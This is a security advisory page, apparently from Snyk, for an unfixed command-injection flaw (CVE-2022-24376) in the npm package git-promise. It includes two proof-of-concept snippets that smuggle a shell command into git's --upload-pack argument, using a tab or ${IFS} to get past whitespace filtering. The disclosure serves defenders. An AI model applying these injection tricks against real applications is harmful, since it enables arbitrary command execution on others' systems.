<p>There is no fixed version for <code>git-promise</code>.</p>

Command Injection Affecting git-promise package, versions *

Snyk CVSS

Attack Complexity Low

Privileges Required High

Confidentiality High

Integrity High

Availability High

Threat Intelligence

EPSS 0.86% (83^rd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-JS-GITPROMISE-2434310
published 8 Jun 2022
disclosed 28 Mar 2022
credit Liran Tal

Report a new vulnerability Found a mistake?

Introduced: 28 Mar 2022

CVE-2022-24376 Open this link in a new tab CWE-78 Open this link in a new tab First added by Snyk

How to fix?

There is no fixed version for git-promise.

Overview

git-promise is a Simple wrapper that allows you to run any git command using a more intuitive syntax.

Affected versions of this package are vulnerable to Command Injection due to an inappropriate fix of a prior vulnerability in this package. Note: Please note that the vulnerability will not be fixed. The README file was updated with a warning regarding this issue.

PoC 1

const git = require("git-promise");
// Use tab instead of spaces to separate between the touch command and its argument
git("fetch origin --upload-pack=touch	/tmp/abcd", {cwd: '/tmp/example-git-repo'}).then((output) => console.log(output))

PoC 2

const git = require("git-promise");
// Use the shell's predefined separator using ${IFS} to escape the whitespace splitting logic
git("fetch origin --upload-pack=touch${IFS}/tmp/abcd-new", {cwd: '/tmp/example-git-repo'}).then((output) => console.log(output))

References

GitHub Gist